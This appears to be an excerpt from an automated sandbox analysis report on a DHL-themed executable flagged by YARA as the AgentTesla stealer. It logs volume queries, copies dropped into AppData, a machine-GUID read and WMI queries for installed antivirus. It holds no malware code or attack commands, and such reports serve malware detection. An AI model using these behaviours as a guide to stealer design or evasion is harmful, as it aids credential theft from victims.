                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Users\user\Desktop\DHL_1003671162.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Users\user\AppData\Roaming\qmUxKv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Users\user\AppData\Roaming\qmUxKv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
